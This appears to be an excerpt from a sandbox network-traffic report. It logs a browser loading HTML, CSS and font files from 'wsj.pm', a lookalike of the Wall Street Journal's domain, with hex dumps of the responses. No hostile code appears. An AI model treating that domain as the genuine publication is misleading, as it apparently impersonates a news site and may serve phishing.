                                                                                                                2024-04-25 14:58:17 UTC278INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:17 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Thu, 25 Apr 2024 14:32:48 GMT
                                                                                                                ETag: "10a944-616eca9453a4b"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 1091908
                                                                                                                Vary: Accept-Encoding
                                                                                                                Connection: close
                                                                                                                Content-Type: text/html
                                                                                                                2024-04-25 14:58:17 UTC7914INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 0a 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 42 72 65 61 6b 69 6e 67 20 6e 65 77 73 20 61 6e 64 20 61 6e 61 6c 79 73 69 73 20 66 72 6f 6d 20 74 68 65 20 55 2e 53 2e 20 61 6e 64 20 61 72 6f 75 6e 64 20 74 68 65 20 77 6f 72 6c 64 20 61 74 20 57 53 4a 2e 63 6f 6d 2e 20 50 6f 6c 69 74 69 63 73 2c 20 45 63 6f 6e 6f 6d 69 63 73 2c 20 4d 61 72 6b 65 74 73 2c 20 4c 69 66 65 20 26 20 41 72 74 73 2c 20 61 6e 64 20 69 6e 2d 64 65 70 74 68 20 72 65 70 6f 72 74 69 6e 67 2e 22 20 2f
                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en><head> <meta charset="UTF-8"> <meta name="description" content="Breaking news and analysis from the U.S. and around the world at WSJ.com. Politics, Economics, Markets, Life & Arts, and in-depth reporting." /
                                                                                                                2024-04-25 14:58:17 UTC8000INData Raw: 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 2f 66 6f 6e 74 73 2f 77 6f 66 66 73 2f 72 65 74 69 6e 61 2f 52 65 74 69 6e 61 4e 61 72 72 2d 4c 69 67 68 74 2e 77 6f 66 66 32 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 32 22 0a 20 20 20 20 20 20 20 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 2f 66 6f 6e 74 73 2f 77 6f 66 66 73 2f 72 65 74 69 6e 61 2f 52 65 74 69 6e 61 4e 61 72 72 2d 42 6f 6f 6b 2e 77 6f 66 66 32 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 32 22 0a 20 20 20 20 20 20 20 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65
                                                                                                                Data Ascii: l="preload" href="/fonts/woffs/retina/RetinaNarr-Light.woff2" as="font" type="font/woff2" crossorigin /> <link rel="preload" href="/fonts/woffs/retina/RetinaNarr-Book.woff2" as="font" type="font/woff2" crossorigin /> <link rel="pre
                                                                                                                2024-04-25 14:58:17 UTC8000INData Raw: 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 65 66 74 3a 20 2d 39 2e 35 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 6f 70 3a 20 39 2e 35 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 32 2e 35 70 78 20 73 6f 6c 69 64 20 23 66 66 66 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 42 61 72 72 6f 6e 73 54 68 65 6d 65 2d 2d 62 75 74 74 6f 6e 2d 2d 6b 43 5f 55 38 31 55 56 3a 66 6f 63 75 73 20 7b
                                                                                                                Data Ascii: tion: absolute; left: -9.5px; top: 9.5px; width: 0; height: 0; border: 11px solid transparent; border-top: 12.5px solid #fff } .BarronsTheme--button--kC_U81UV:focus {
                                                                                                                2024-04-25 14:58:17 UTC8000INData Raw: 2d 72 65 63 65 6e 74 2d 2d 69 55 31 50 74 39 64 32 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 37 37 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 37 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2e 38 30 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 74 72 61 6e 73 66 6f
                                                                                                                Data Ascii: -recent--iU1Pt9d2 { display: inline-block; width: 77px; color: #000; font-size: 12px; line-height: 17px; font-weight: 500; letter-spacing: .806px; text-transfo
                                                                                                                2024-04-25 14:58:17 UTC8000INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 34 70 78 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 6c 65 61 64 2d 62 75 63 6b 65 74 2d 2d 31 53 76 61 47 70 57 6b 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 73 75 6d 6d 61 72 79 2d 2d 6c 6d 4f 58 45 73 62 4e 2c 0a 20 20 20 20 20 20 20 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 6c 65 61 64 2d 73 74 6f 72 79 2d 2d 33 4a 69 38 7a 47 5a 77 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 73 75 6d 6d 61 72 79 2d 2d 6c 6d 4f 58 45 73 62 4e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 30 70 78 0a 20 20 20 20 20 20 20 20 7d 0a
                                                                                                                Data Ascii: padding-bottom: 4px } .WSJTheme--lead-bucket--1SvaGpWk .WSJTheme--summary--lmOXEsbN, .WSJTheme--lead-story--3Ji8zGZw .WSJTheme--summary--lmOXEsbN { font-size: 14px; line-height: 20px }
                                                                                                                2024-04-25 14:58:17 UTC8000INData Raw: 20 66 6c 65 78 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 77 68 61 74 73 6e 65 77 73 2d 73 74 6f 72 79 2d 2d 33 43 52 35 72 76 39 67 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 6d 6f 62 69 6c 65 53 68 61 72 65 4d 65 6e 75 2d 2d 33 75 72 39 67 33 43 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 63 6f 6d 6d 65 6e 74 53 68 61 72 65 49 63 6f 6e 73 2d 2d 33 4e 55 61 7a 5a 58 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 69 6d 61 67 65
                                                                                                                Data Ascii: flex } .WSJTheme--whatsnews-story--3CR5rv9g .WSJTheme--mobileShareMenu--3ur9g3Ct { float: right } .WSJTheme--commentShareIcons--3NUazZXk { display: inline-block } .WSJTheme--image
                                                                                                                2024-04-25 14:58:17 UTC8000INData Raw: 33 75 45 45 47 73 65 6c 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 68 65 61 64 6c 69 6e 65 2d 2d 37 56 43 7a 6f 37 41 79 20 68 34 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 6c 65 66 74 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 34 70 78 20 32 30 70 78 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 74 79 6c 65
                                                                                                                Data Ascii: 3uEEGsel .WSJTheme--headline--7VCzo7Ay h4 { border-top: 1px solid #ccc; border-left: 1px solid #ccc; border-right: 1px solid #ccc; padding: 14px 20px 0; position: relative; font-style
                                                                                                                2024-04-25 14:58:17 UTC8000INData Raw: 20 20 20 20 20 20 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 73 6c 69 6d 2d 2d 32 6b 7a 6b 50 46 56 72 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 68 65 61 64 6c 69 6e 65 2d 2d 37 56 43 7a 6f 37 41 79 2c 0a 20 20 20 20 20 20 20 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 74 68 75 6d 62 6e 61 69 6c 2d 73 6c 69 6d 2d 2d 7a 32 78 50 5a 69 67 68 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 68 65 61 64 6c 69 6e 65 2d 2d 37 56 43 7a 6f 37 41 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 35 70 78 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 74 68 75 6d 62 6e 61 69 6c 2d 2d 31 57 46 43 71 5f 58 4a 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 68 65 61 64 6c 69 6e 65 2d 2d 37 56 43 7a 6f 37 41 79 20 68 32 2c 0a 20
                                                                                                                Data Ascii: .WSJTheme--slim--2kzkPFVr .WSJTheme--headline--7VCzo7Ay, .WSJTheme--thumbnail-slim--z2xPZigh .WSJTheme--headline--7VCzo7Ay { margin-right: 5px } .WSJTheme--thumbnail--1WFCq_XJ .WSJTheme--headline--7VCzo7Ay h2,
                                                                                                                2024-04-25 14:58:17 UTC8000INData Raw: 20 31 2e 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 65 74 69 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 63 6f 6d 62 69 6e 65 64 2d 62 79 6c 69 6e 65 2d 74 69 6d 65 73 74 61 6d 70 2d 2d 32 68 6e 76 39 34 6a 31 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 62 79 6c 69 6e 65 2d 2d 31 6f 49 55 76 74 51 33 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 63 6f 6d 62 69
                                                                                                                Data Ascii: 1.2em; font-family: Retina, Arial, Helvetica, sans-serif; font-weight: 300 } .WSJTheme--combined-byline-timestamp--2hnv94j1 .WSJTheme--byline--1oIUvtQ3 { float: left } .WSJTheme--combi
                                                                                                                2024-04-25 14:58:17 UTC8000INData Raw: 31 37 52 36 57 6e 43 59 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 62 79 6c 69 6e 65 2d 2d 31 6f 49 55 76 74 51 33 2c 0a 20 20 20 20 20 20 20 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 66 6f 65 2d 61 72 74 69 63 6c 65 2d 2d 31 37 52 36 57 6e 43 59 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 68 65 61 64 6c 69 6e 65 2d 2d 37 56 43 7a 6f 37 41 79 20 61 2c 0a 20 20 20 20 20 20 20 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 66 6f 65 2d 61 72 74 69 63 6c 65 2d 2d 31 37 52 36 57 6e 43 59 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 68 65 61 64 6c 69 6e 65 2d 2d 37 56 43 7a 6f 37 41 79 20 61 3a 6c 69 6e 6b 2c 0a 20 20 20 20 20 20 20 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 66 6f 65 2d 61 72 74 69 63 6c 65 2d 2d 31 37 52 36 57 6e 43 59 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 68 65 61 64 6c 69 6e 65 2d 2d 37 56
                                                                                                                Data Ascii: 17R6WnCY .WSJTheme--byline--1oIUvtQ3, .WSJTheme--foe-article--17R6WnCY .WSJTheme--headline--7VCzo7Ay a, .WSJTheme--foe-article--17R6WnCY .WSJTheme--headline--7VCzo7Ay a:link, .WSJTheme--foe-article--17R6WnCY .WSJTheme--headline--7V


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.1749721103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:17 UTC525OUTGET /css/footer.css HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: style
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:17 UTC273INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:17 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:28:24 GMT
                                                                                                                ETag: "359e-61649270f4600"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 13726
                                                                                                                Vary: Accept-Encoding
                                                                                                                Connection: close
                                                                                                                Content-Type: text/css
                                                                                                                2024-04-25 14:58:17 UTC7919INData Raw: 2e 73 74 79 6c 65 2d 2d 77 73 6a 2d 66 6f 6f 74 65 72 2d 2d 31 6f 79 66 6a 61 53 45 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 52 65 74 69 6e 61 0d 0a 20 20 20 7d 0d 0a 20 20 20 2e 73 74 79 6c 65 2d 2d 77 73 6a 2d 66 6f 6f 74 65 72 2d 2d 31 6f 79 66 6a 61 53 45 20 61 3a 61 63 74 69 76 65 2c 0d 0a 20 20 20 2e 73 74 79 6c 65 2d 2d 77 73 6a 2d 66 6f 6f 74 65 72 2d 2d 31 6f 79 66 6a 61 53 45 20 61 3a 6c 69 6e 6b 2c 0d 0a 20 20 20 2e 73 74 79 6c 65 2d 2d 77 73 6a 2d 66 6f 6f 74 65 72 2d 2d 31 6f 79 66 6a 61 53 45 20 61 3a 76 69 73 69 74 65 64 20 7b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 0d 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0d 0a 20 20 20 20 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 0d
                                                                                                                Data Ascii: .style--wsj-footer--1oyfjaSE { font-family:Retina } .style--wsj-footer--1oyfjaSE a:active, .style--wsj-footer--1oyfjaSE a:link, .style--wsj-footer--1oyfjaSE a:visited { color:inherit; text-decoration:none; outline:none
                                                                                                                2024-04-25 14:58:17 UTC5807INData Raw: 6c 65 2d 2d 32 4c 51 31 74 36 59 38 2e 57 53 4a 4a 61 70 61 6e 54 68 65 6d 65 2d 2d 70 72 6f 64 75 63 74 73 2d 74 69 74 6c 65 2d 2d 32 4c 51 31 74 36 59 38 2c 0d 0a 20 20 20 2e 57 53 4a 4a 61 70 61 6e 54 68 65 6d 65 2d 2d 73 75 62 73 63 72 69 62 65 2d 6c 69 6e 6b 2d 2d 33 50 4a 72 6d 54 33 6a 2e 57 53 4a 4a 61 70 61 6e 54 68 65 6d 65 2d 2d 73 75 62 73 63 72 69 62 65 2d 6c 69 6e 6b 2d 2d 33 50 4a 72 6d 54 33 6a 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 0d 0a 20 20 20 7d 0d 0a 20 20 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 65 64 69 74 69 6f 6e 2d 64 72 6f 70 64 6f 77 6e 2d 2d 74 79 6e 4e 56 55 47 4a 20 7b 0d 0a 20 20 20 20 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 0d 0a 20 20 20 7d 0d 0a 20 20 20 2e 57 53 4a 54 68 65 6d 65 2d 2d 65 64
                                                                                                                Data Ascii: le--2LQ1t6Y8.WSJJapanTheme--products-title--2LQ1t6Y8, .WSJJapanTheme--subscribe-link--3PJrmT3j.WSJJapanTheme--subscribe-link--3PJrmT3j { font-weight:600 } .WSJTheme--edition-dropdown--tynNVUGJ { cursor:pointer } .WSJTheme--ed


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                2192.168.2.1749720103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:17 UTC552OUTGET /fonts/woffs/retina/Retina-Book.woff2 HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                Origin: https://wsj.pm
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: font
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:17 UTC252INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:17 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Fri, 08 Jul 2022 15:09:11 GMT
                                                                                                                ETag: "b7fc-5e34c95a213c0"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 47100
                                                                                                                Connection: close
                                                                                                                Content-Type: font/woff2
                                                                                                                2024-04-25 14:58:17 UTC7940INData Raw: 77 4f 46 32 00 01 00 00 00 00 b7 fc 00 12 00 00 00 02 2b 3c 00 00 b6 d1 00 01 00 00 00 00 b7 38 00 00 00 c4 00 00 01 f0 00 00 00 00 00 00 00 00 19 3a 1a 81 62 1b 81 bd 3c 1c ad 5c 06 60 00 93 00 08 78 09 9a 16 11 08 0a 85 d1 64 85 99 55 01 36 02 24 03 97 6e 0b 8b 7a 00 04 20 05 8e 62 07 b1 0c 0c 81 23 5b f7 07 92 0d 85 e3 fe 3e 69 11 49 98 61 74 8e 6d cb 04 e0 d4 15 d5 f4 25 ca b6 5d 93 f4 dc d4 81 95 1a 2d b4 62 6c cb 88 77 b7 aa 92 a1 1e 24 64 ff ff ff ff ff ff ff bf 28 69 c8 98 e5 52 c8 b5 2d 00 80 8a aa a2 b2 f9 db e6 1e 62 ee 91 a6 98 a2 49 31 29 67 94 26 23 27 34 b9 cd 6d c9 9d 4a 5f 72 3b e4 24 a4 e2 56 6a 31 34 82 cc 18 7b 8c 8d 49 13 95 2a 93 2a 99 31 61 b7 b7 5e 8d 57 7f 58 d8 51 43 6f 26 13 e5 68 84 53 6a a8 44 25 2a 85 9e 71 b9 12 87 df c8 80
                                                                                                                Data Ascii: wOF2+<8:b<\`xdU6$nz b#[>iIatm%]-blw$d(iR-bI1)g&#'4mJ_r;$Vj14{I**1a^WXQCo&hSjD%*q
                                                                                                                2024-04-25 14:58:18 UTC8000INData Raw: e0 ed ad ab b9 97 ae 2b ba e6 09 09 84 09 ea 18 be 63 f4 4f 7e 59 af cf 92 fd 3f 51 d9 19 46 18 0c 89 e6 2a c8 6c da 55 d1 6f 11 95 29 23 c4 a3 20 4a 3c 3c 6d 28 29 47 ed 9b 4c 80 5f cd 7e ed ca f0 eb 5b 65 da 0c c6 c8 9b cd c6 ca 06 94 6f a4 c1 a6 5c 71 56 19 58 46 1a 80 37 eb a6 7f ea d7 d9 70 d4 18 8a 55 d5 03 fb 50 b6 4b 75 09 a0 95 6b ab 0f 07 ea a0 c8 64 8e 45 ee 94 09 25 be 2b a5 d2 0b 7d ba ef 0e d4 db 75 2e 6f 00 96 c0 cd cd d8 ac 9a 74 27 8f d5 7a 5d fc 5d 74 ee 24 0d 6e 03 83 e6 88 a5 74 a9 0a ef 20 c4 ce 49 d0 ea 3a 46 8a 49 90 da f7 d4 35 bb 5a 61 b7 de 78 70 5b 27 42 f5 ad fe 5b 9b b5 a8 ff 58 6d 2b f4 7b ab 79 d3 06 4d 1a b7 23 e3 d2 f7 41 86 15 1d 75 d7 ff 21 54 fb fd af 4f 7c ed 4f f1 e2 a6 85 05 67 37 9e e2 97 88 1b aa dd 20 36 b4 27 b8
                                                                                                                Data Ascii: +cO~Y?QF*lUo)# J<<m()GL_~[eo\qVXF7pUPKukdE%+}u.ot'z]]t$nt I:FI5Zaxp['B[Xm+{yM#Au!TO|Og7 6'
                                                                                                                2024-04-25 14:58:18 UTC8000INData Raw: 6b 56 ef b8 46 6b 6a e1 87 81 d9 aa 9b dd 63 ff 78 32 e0 d4 36 6d 6b 8f e4 c5 a0 d3 3e 60 87 c3 14 3a b0 e4 c8 71 81 8c 85 3b 94 d5 26 bd d1 c5 cc 6a a6 ad 29 90 85 72 11 ea 8b 58 d6 80 b9 67 e6 bc 1f c7 1f b8 a2 2a aa c6 3e d5 35 cb cc 25 61 a7 91 b9 07 0d 6c da 5a 4c da 34 13 1b 9d 98 5b 83 49 62 f8 96 9c df 85 11 30 0c 41 e1 2c 03 23 9f 47 7d b1 61 02 0a cb 10 bf 63 e9 93 27 b1 5f cd 33 c3 41 91 47 a2 47 f6 69 c1 64 6a e3 d3 b1 ae 48 a3 90 3d ac dd b4 a6 dc 63 d6 d0 f3 43 0c 3e 98 92 47 38 3b 32 dc 74 17 c1 36 39 42 75 f8 bc 2a c8 dc f4 6f 2e a4 52 31 d7 df c7 45 a0 cc 19 8a 8f 98 b6 e4 06 ca 1b 2c a1 82 92 8d 69 23 b3 f5 16 98 c8 91 b5 a0 80 86 1f 7d 24 0a 2e 94 ec 83 29 fa 20 99 2a 47 74 b9 80 98 e8 bf 6b 03 86 8d b4 f9 74 2c 02 b5 94 03 e1 bd 91 d5
                                                                                                                Data Ascii: kVFkjcx26mk>`:q;&j)rXg*>5%alZL4[Ib0A,#G}ac'_3AGGidjH=cC>G8;2t69Bu*o.R1E,i#}$.) *Gtkt,
                                                                                                                2024-04-25 14:58:18 UTC8000INData Raw: a5 aa e5 72 7f c0 0f 77 6d a9 f4 b5 0e 54 57 d4 cf b2 66 89 80 bf dd e3 2c 82 bd 35 07 ad 8b b6 59 62 a4 55 32 e4 bb ce 00 4b 95 43 48 17 6e f6 ec 93 09 2c 34 ae 6c 46 79 0c 80 f5 bd 40 d1 45 56 c1 42 9d d1 bf ba 8a c0 2d a3 f8 39 61 1d f4 17 83 63 f1 50 ff 65 e3 fb 69 77 c8 1a b2 29 69 2d 74 36 75 ef 4a e5 a7 0d a8 ff b2 5c 5b 8e b4 8f d7 3a 6a 91 6b 8e 55 e6 08 9d 8d 48 c3 b1 39 39 5c 4f e3 7b c8 4b 86 bb 91 4c 56 08 53 67 6b 85 dc e1 41 d0 5d 37 af 2f 1f 58 06 16 2a 3a 62 21 c5 76 b6 28 e6 c3 d1 c2 93 8f 3e d3 33 d3 0b 3c 24 90 80 4f a1 f2 f9 20 92 bb 90 48 6d 8f a5 1e 7d 9c dc 05 8b 9b fb 4c 55 1e 8d ff 32 f0 f8 6d 27 5a ec c4 dd f3 29 ff 64 83 b5 97 bd 1f 53 90 b9 5b ad 6a eb 0f 12 25 a3 1f 51 ad 75 23 27 af 05 8b 6d c9 b3 76 e1 d6 c2 c8 b0 f1 ef fa
                                                                                                                Data Ascii: rwmTWf,5YbU2KCHn,4lFy@EVB-9acPeiw)i-t6uJ\[:jkUH99\O{KLVSgkA]7/X*:b!v(>3<$O Hm}LU2m'Z)dS[j%Qu#'mv
                                                                                                                2024-04-25 14:58:18 UTC8000INData Raw: 85 73 35 42 4e eb b6 9a 05 e6 fc 9a 41 a3 ab 3b 8b 46 f6 76 c1 50 2b af ab 6c b9 29 df f1 ff ad 1b 99 9a d4 94 69 e6 3b a2 9e 84 19 f6 85 4e b5 b2 c6 cb 4c 00 7e ec 06 24 be 93 27 4b 51 df 03 86 18 8e 6b 7b 33 af 6c 26 09 08 91 1a 31 43 1f b0 6d f5 6a 2c 29 2b 56 af 88 29 e2 f4 92 3c 3b 92 5f 0f be 5d 33 c7 48 91 ee 9d 70 e1 6b 37 cd 78 82 59 48 5f 0f 32 d8 e6 13 ab 99 55 aa 27 0b d5 a2 43 bd 97 4f 87 fd c8 48 15 bc 3a d6 ed 6a 28 7a 18 88 f3 03 db 55 6c 69 d2 c2 7d 27 41 45 a9 e5 03 82 e8 54 73 74 d2 e9 6c 29 10 49 e1 0b 16 80 8c 94 97 0a ff 62 67 a3 dc 53 39 ee 9f a9 ec 99 a0 68 57 70 f2 41 4b 3d bc bc 61 90 42 d7 1a 99 82 f8 23 a9 7b 52 92 e9 ff ec a5 c3 2d 99 72 9f 9f 65 13 49 31 47 a5 cb 16 67 41 2c 39 c8 dd 79 ef 13 d3 3f 2f b9 c0 22 c4 ab 6c 45 65
                                                                                                                Data Ascii: s5BNA;FvP+l)i;NL~$'KQk{3l&1Cmj,)+V)<;_]3Hpk7xYH_2U'COH:j(zUli}'AETstl)IbgS9hWpAK=aB#{R-reI1GgA,9y?/"lEe
